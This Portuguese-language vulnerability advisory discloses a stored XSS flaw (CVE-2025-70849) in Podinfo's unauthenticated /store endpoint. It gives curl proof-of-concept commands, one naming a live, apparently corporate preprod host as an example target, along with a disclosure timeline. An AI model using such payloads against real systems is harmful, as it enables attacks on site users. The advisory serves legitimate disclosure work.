CVE-2025-70849: XSS Armazenado no Podinfo
Resumo
Uma vulnerabilidade de segurança (CWE-79) foi identificada no Podinfo, uma aplicação web para demonstração de microsserviços Kubernetes. O recurso /store permite que usuários não autenticados enviem conteúdo HTML/JS arbitrário, resultando em XSS Armazenado.
Detalhes da Vulnerabilidade
- ID do CVE: CVE-2025-70849
- Produto: Podinfo
- Endpoint Afetado:
/store
- Tipo de Vulnerabilidade: Cross-Site Scripting Armazenado (XSS)
- Versões Afetadas:
<= 6.10.0
Prova de Conceito (PoC)
- Envie o payload malicioso:
curl -X POST https://target/store -H "Content-Type: text/html" -d '<h1>CVE-2025-70849</h1>'
exemplo com alvo ativo:
curl -X POST https://podinfo.xcr.preprod55.prepd.eastus.kaas.sws.siemens.com/store -H "Content-Type: text/html" -d '<h1>CVE-2025-70849</h1>'
-
Acesse o hash retornado: https:///store/
exemplo: https://podinfo.xcr.preprod55.prepd.eastus.kaas.sws.siemens.com/store/8c1591e1b1e025067a2d73c0853b9a76bd8fc91a
Cronograma
- Descoberta: Set 2025
- Notificado ao Fornecedor: 25 OUT 2025
- Resposta do Fornecedor: Reconheceu; afirmou que não há previsão para correção no momento.
- Divulgação Pública: Fevereiro 2026
Aviso Legal
Esta pesquisa é apenas para fins educacionais.
AGRADECIMENTOS:
Kazi Sabbir |